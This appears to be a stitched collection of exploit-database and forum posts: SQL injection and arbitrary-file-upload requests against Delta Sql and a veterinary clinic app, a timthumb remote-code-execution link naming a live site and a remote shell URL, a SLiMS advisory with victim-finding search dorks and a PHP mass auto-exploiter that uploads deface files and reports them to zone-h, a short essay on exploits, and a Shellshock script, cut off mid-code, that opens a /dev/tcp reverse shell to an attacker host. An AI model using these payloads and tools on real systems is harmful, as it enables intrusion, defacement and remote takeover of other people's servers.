  12. # Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload

    # Dork: N/A
    # Date: 2018-10-25
    # Exploit Author: Ihsan Sencan
    # Vendor Homepage: http://deltasql.sourceforge.net/
    # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
    # Software Link: http://deltasql.sourceforge.net/deltasql/
    # Version: 1.8.2
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A

    # POC:
    # 1)
    # http://localhost/[PATH]/docs_manage.php?id=1
    #
    # http://localhost/[PATH]/upload/[FILE]

    POST /[PATH]/docs_upload.php HTTP/1.1
    Host: TARGET
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/[PATH]/docs_manage.php?id=1
    Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------158943328914318561992147220435
    Content-Length: 721

    -----------------------------158943328914318561992147220435
    Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php"
    Content-Type: application/force-download

    <?php phpinfo(); ?>
    -----------------------------158943328914318561992147220435
    Content-Disposition: form-data; name="submit"

    Upload File
    -----------------------------158943328914318561992147220435
    Content-Disposition: form-data; name="id"

    1
    -----------------------------158943328914318561992147220435
    Content-Disposition: form-data; name="version"

    -----------------------------158943328914318561992147220435
    Content-Disposition: form-data; name="hasdocs"

    -----------------------------158943328914318561992147220435--

    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2018 00:24:27 GMT
    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
    X-Powered-By: PHP/5.6.30
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Length: 1783
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

    <html>
    <body>
    <form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data">
      Select document to upload:
      <input name="fileToUpload" id="fileToUpload" type="file">
      <input value="Ver Ayari" name="submit" type="submit">
      <input value="1" name="id" type="hidden">
      <input value="1'" name="version" type="hidden">
      <input value="1" name="hasdocs" type="hidden">
    </form>
    </body>
    </html>
  13. # Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection

    # Dork: N/A
    # Date: 2018-10-25
    # Exploit Author: Ihsan Sencan
    # Vendor Homepage: http://deltasql.sourceforge.net/
    # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
    # Software Link: http://deltasql.sourceforge.net/deltasql/
    # Version: 1.8.2
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A

    # POC:
    # 1)
    # http://localhost/[PATH]/docs_manage.php?id=[SQL]&version=1&hasdocs=1

    GET /[PATH]/docs_manage.php?id=1++uNiOn+seleCt+0x31,0x32,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),0x34,0x35--+-&version=1&hasdocs=1 HTTP/1.1
    Host: TARGET
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
    Connection: keep-alive

    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2018 00:12:57 GMT
    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
    X-Powered-By: PHP/5.6.30
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    # POC:
    # 2)
    # http://localhost/[PATH]/list_project_modules.php?id=[SQL]&name=1

    GET /[PATH]/list_project_modules.php?id=-1%20union%20select%20null,(0x32),null--&name=1 HTTP/1.1
    Host: TARGET
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
    Connection: keep-alive

    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2018 00:08:03 GMT
    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
    X-Powered-By: PHP/5.6.30
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Length: 2150
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  14. # Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://vetclinic.sourceforge.io/ # Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download # Version: 00.02 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] # # [PATH]/petmaint.php # .... #154 $editpetnum = ""; #155 #156 if(isset($_POST["editpetnum"])) { #157 $editpetnum = $_POST["editpetnum"]; #158 unset($_POST["editpetnum"]); #159 } #160 else if(isset($_GET["editpetnum"])) { #161 $editpetnum = $_GET["editpetnum"]; #162 unset($_GET["editpetnum"]); #163 } # .... GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:18:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # 
POC: # 2) # http://localhost/[PATH]/procmaint.php?proccode=[SQL] # # [PATH]/procmaint.php # .... #28 require_once "includes/common.inc"; #29 $emplnumber = $_SESSION['employeenumber']; #30 $display = "ProcMaint:".$emplnumber; #31 if(isset($_GET["proccode"])) { #32 $proccode = $_GET["proccode"]; #33 } else { #34 $proccode = ""; #35 } #36 if ($proccode == "") #37 { # .... GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:22:33 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2697 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  15. # Exploit Title: WordPress aio-shortcodes Plugin - Remote Code Execution # Google Dork: Index of /wp-content/plugins/aio-shortcodes # Exploit: timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php # Date: 26 Oktober 2018 # Author: L4663r666h05t # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.x.x # Screenshot: http://prntscr.com/lahts7 # Tested on: Windows 10 Pro (x64) Versions Affected: 1.x.x Live Site: http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php Your Shell: http://localhost/wp-content/plugins/aio-shortcodes/cache/md5.php http://localhost/wp-content/plugins/aio-shortcodes/cache/shell.php
  16. #Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Remote File Upload Exploit #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team #Vendor Homepage : slims.web.id #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/ #Affected Version : 5/6/7 #Tested on : Windows / Linux #Exploit Risk : High #CXSecurity : cxsecurity.com/ascii/WLB-2018050260 #Cyberizm : cyberizm.org/cyberizm-slims-senayan-library-management-system-indo-exploit.html ############################################################################################################## # Long Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database, circulation, membership management and many more that will help "automating" library tasks. Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search and Advanced Search mode Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.) 
attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema) XML format RSS (Really Simple Syndication) XML format for OPAC OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting) in Dublin Core format for metadata harvesting purpose Bibliographic/catalog database management with book cover image support Serial publication control Document items (book copies) management with barcode support Master Files management to manages document referential data such as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers Circulation support with following sub-features : Loan and Return transaction Collections reservation Quick return Configurable and flexible Loan Rules Membership management Stock Taking module to help Stock Op name process in library Reporting and Statistics System modules with following sub-features : Global system configuration Modules management Application Users and Groups management Holiday settings Barcodes generator utility Database backup utility Responsive user interface 3rd party bibliographic records indexing support with Sphinx Search and MongoDB Demo Version : softaculous.com/softaculous/demos/SLiMS Admin Username: admin Admin Password: pass ############################################################################################################## #Slims CMS Senayan OpenSource Library Management System File Attachment Arbitrary File Upload Vulnerability Original Affected Code Here => # Example Affected Code from slims5_meranti [ Original Vulnerability Code ] => [/code]<?php /** * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. 
* * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* Biblio file Adding Pop Windows */ // key to authenticate define('INDEX_AUTH', '1'); // key to get full database access define('DB_ACCESS', 'fa'); // main system configuration require '../../../sysconfig.inc.php'; // IP based access limitation require LIB_DIR.'ip_based_access.inc.php'; do_checkIP('smc'); do_checkIP('smc-bibliography'); // start the session require SENAYAN_BASE_DIR.'admin/default/session.inc.php'; require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php'; // privileges checking $can_write = utility::havePrivilege('bibliography', 'w'); if (!$can_write) { die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>'); } // page title $page_title = 'File Attachment Upload'; // check for biblio ID in url $biblioID = 0; if (isset($_GET['biblioID']) AND $_GET['biblioID']) { $biblioID = (integer)$_GET['biblioID']; } // check for file ID in url $fileID = 0; if (isset($_GET['fileID']) AND $_GET['fileID']) { $fileID = (integer)$_GET['fileID']; } // start the output buffer ob_start(); /* main content */ // biblio topic save proccess if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') { $uploaded_file_id = 0; $title = 
trim(strip_tags($_POST['fileTitle'])); $url = trim(strip_tags($_POST['fileURL'])); // create new sql op object $sql_op = new simbio_dbop($dbs); // FILE UPLOADING if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) { // create upload object $file_dir = trim($_POST['fileDir']); $file_upload = new simbio_file_upload(); $file_upload->setAllowableFormat($sysconf['allowed_file_att']); $file_upload->setMaxSize($sysconf['max_upload']*1024); $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir)); $file_upload_status = $file_upload->doUpload('file2attach'); if ($file_upload_status === UPLOAD_SUCCESS) { $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1); $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename); $fdata['file_url'] = $dbs->escape_string($url); $fdata['file_dir'] = $dbs->escape_string($file_dir); $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = $sysconf['mimetype'][$file_ext]; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')'); } else { echo '<script type="text/javascript">'; echo 'alert(\''.__('Upload FAILED! 
Forbidden file type or file size too big!').'\');'; echo 'self.close();'; echo '</script>'; die(); } } else { if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) { $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($url); $fdata['file_url'] = $dbs->escape_string($fdata['file_name']); $fdata['file_dir'] = 'literal{NULL}'; $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = 'text/uri-list'; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; } } // BIBLIO FILE RELATION DATA UPDATE // check if biblio_id POST var exists if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) { $updateBiblioID = (integer)$_POST['updateBiblioID']; $data['biblio_id'] = $updateBiblioID; $data['file_id'] = $uploaded_file_id; $data['access_type'] = trim($_POST['accessType']); $data['access_limit'] = 'literal{NULL}'; // parsing member type data if ($data['access_type'] == 'public') { $groups = ''; if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) { $groups = serialize($_POST['accLimit']); } else { $groups = 'literal{NULL}'; } $data['access_limit'] = trim($groups); } if (isset($_POST['updateFileID'])) { $fileID = (integer)$_POST['updateFileID']; // file biblio access update $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' 
AND file_id='.$fileID); // file description update $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID); if ($update1) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment data updated!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error); } } else { if ($sql_op->insert('biblio_attachment', $data)) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error); } } utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' 
updating file attachment data'); } else { if ($uploaded_file_id) { // add to session array $fdata['file_id'] = $uploaded_file_id; $fdata['access_type'] = trim($_POST['accessType']); $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata; echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');'; echo '</script>'; } } } // create new instance $form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post'); $form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"'; // form table attributes $form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"'; $form->table_header_attr = 'class="alterCell" style="font-weight: bold;"'; $form->table_content_attr = 'class="alterCell2"'; // query $file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID"); $file_attach_d = $file_attach_q->fetch_assoc(); // edit mode if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) { $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']); $form->addHidden('updateFileID', $file_attach_d['file_id']); } else if ($biblioID) { $form->addHidden('updateBiblioID', $biblioID); } // file title $form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"'); // file attachment if ($file_attach_d['file_name']) { $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']); } else { // file upload dir // create simbio directory object $repo = new simbio_directory(REPO_BASE_DIR); $repo_dir_tree = $repo->getDirectoryTree(5); $repodir_options[] = array('', __('Repository ROOT')); if (is_array($repo_dir_tree)) { // sort array by index 
ksort($repo_dir_tree); // loop array foreach ($repo_dir_tree as $dir) { $repodir_options[] = array($dir, $dir); } } // add repo directory options to select list $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options); // file upload $str_input = simbio_form_element::textField('file', 'file2attach'); $str_input .= ' Maximum '.$sysconf['max_upload'].' KB'; $form->addAnything(__('File To Attach'), $str_input); } // file url $form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"'); // file description $form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"'); // file access $acctype_options[] = array('public', __('Public')); $acctype_options[] = array('private', __('Private')); $form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']); // file access limit if set to public $group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type'); $group_options = array(); while ($group_data = $group_query->fetch_row()) { $group_options[] = array($group_data[0], $group_data[1]); } $form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null ); // print out the object echo $form->printOut(); /* main content end */ $content = ob_get_clean(); // include the page template require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';[/code] ############################################################################################################## #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit #Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id 
#Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC Note : Use your brain to find more dorks. Note : Please upgrade and update your site on the latest versions of SLİMS Senayan Library Management System and do not let special characters or add admin in the next version. #Exploit Code : ..../admin/modules/bibliography/pop_attach.php #Path : /repository/.... # Note : Fill the form and choose your file and upload it. # Allowed File Extensions : txt jpg gif png #Indonesian Government / Education Sites are vulnerable for this issue. #Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool. 
############################################################################################################## #Auto Exploiter PHP Code => [code]<?php /* # KingSkrupellos from Cyberizm Digital Security Team # Our Security Forum : cyberizm.org # Twitter : twitter.com/kngskrplls # your list.txt must a single directory with this exploiter # ############################################### # This Exploit and Vulnerability was discovered by KingSkrupellos # Thanks for All Moslem Hackers and Cyberizm Digital Security Team # This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command. # If the command don't understand the command, please exploit it manually. # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team ################################################# # note : Please do not remove Cyberizm copyright. # This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team */ echo " File Attachment Auto Exploiter - coded by KingSkrupellos $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team "; echo "Input your target list: "; $list = trim(fgets(STDIN)); $shell = "yourdefacefilename.txt"; $nickzoneh = "KingSkrupellos"; $exploit = "/admin/modules/bibliography/pop_attach.php"; $path = "/repository/"; $open = fopen("$list","r"); $size = filesize("$list"); $read = fread($open,$size); $lists = explode("\r\n",$read); echo "\n"; foreach($lists as $target){ if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){ $targets = "http://$target"; }else{ $targets = $target; } echo "Target => $targets\n"; echo " [*] Checking Path : "; $cd = curl_init("$targets$exploit"); curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1); curl_exec($cd); $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE); curl_close($cd); if($httpcode == 200){ echo "200 OK\n"; echo " [*] Uploading shell : "; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 
"$targets/$exploit"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang")); curl_exec($ch); $cek = curl_init(); curl_setopt($cek, CURLOPT_URL, "$targets$path$shell"); curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1); $ceek = curl_exec($cek); $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE); if(preg_match("/hacked/",$ceek) or $ceeks == 200){ echo "OK $targets$path$shell\n"; echo " [*] Zone-H : "; $zh = curl_init("http://zone-h.org/notify/single"); curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($zh, CURLOPT_POST, 1); curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5")); $postzh = curl_exec($zh); if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){ echo "OK\n\n"; }else{ echo "NO\n\n"; } }else{ echo "Failed\n\n"; } }else{ echo "Not Vulnerable\n\n"; } }[/code] Important Note : Only .txt .jpg .gif .png files are allowed. # Uploaded File Directory Path : TARGET/PATH/repository/.... TARGET/repository/.... 
##############################################################################################################
# Example Sites :
############################################################################################################## # Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army ##############################################################################################################
  17. Rednofozi

    What is a hacking exploit?

    Exploits are malicious code written to take advantage of security holes in applications, operating systems, OS kernels, web servers, hardware, and in general any software that runs on a network or a computer. These codes and programs are not necessarily written and published for sabotage; some are written for research and educational purposes, although using them to break into users' systems is common practice. Exploits can be written in various programming languages, and their goal is to gain unauthorized access, carry out various attacks, or disrupt computer systems. Exploits are usually written when vulnerabilities are discovered or after security holes are found. Exploit writers are mostly hackers who use various techniques and methods to write malicious code; sometimes well-known security specialists and administrators have also written exploits to prove important vulnerabilities. Exploits are released in different languages and in different categories. Exploits are mostly written in C++, Perl, PHP and Python, but this varies depending on the type of vulnerability and the vulnerable platform; for example, the language the well-known Metasploit exploits are written in is Ruby. Most exploits are divided into two types: local exploits and remote exploits. Local exploits require prior access to the victim's system and are used after initial access has been obtained, which may have come from other web vulnerabilities; they result in escalating the user's privileges to administrator (admin). Remote exploits use vulnerabilities in applications (Application) and lead to intrusion into the network, usually creating unauthorized access at various levels depending on the type of vulnerability. Exploits are usually published as source code that can be used on different operating systems and needs to be compiled; hackers usually have the compilers for all the different languages on their systems, and compilers are considered an inseparable part of a hacker's toolkit.
    Who are Security Researchers? Bugs and security holes are discovered and reported by these people, which leads to malicious code and exploits being written for the discovered vulnerabilities. Sometimes these people write the code themselves and publish it on security sites to prove the vulnerability, and sometimes for their own fame. Most of these researchers are young and seeking a name, and the dangerous security holes that cause major global security incidents are discovered and used by these young hackers. The economic benefits of exploits and exploit writing: today, buying and selling this code has become a business. Some researchers also use their knowledge for economic and commercial gain, discovering bugs and security holes and selling them; these bugs, which are bought by targeted hackers, are sometimes priced at several million or even several hundred million tomans.
  18. Friends, I was writing dorks when an interesting thing caught my attention. While writing dorks, I suddenly found a dork that bypasses the site's uploader, meaning you can upload your shell script and deface the site. inurl kindeditor/examples/uploadbutton.html The dork is as above; for now I have not found a name for the bug. I think it is of the fcsk bug type, which bypasses the admin uploader!
  19. #!/usr/bin/python ############################################### # Cisco UCS Manager 2.1(1b) Shellshock Exploit # # CVE-2014-6278 # Confirmed on version 2.1(1b), but more are likely vulnerable. # Cisco's advisory: # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash # Exploit generates a reverse shell to a nc listener. # Exploit Author: @thatchriseckert ############################################### import sys import requests import time if len(sys.argv) < 4: print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit" print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>" print "[*]" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444" print "[*] Listener: nc -lvp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() ucs = sys.argv[1] url = "https://" + ucs + "/ucsm/isSamInstalled.cgi" attackhost = sys.argv[2] revshellport = sys.argv[3] headers1 = { 'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1' } headers2 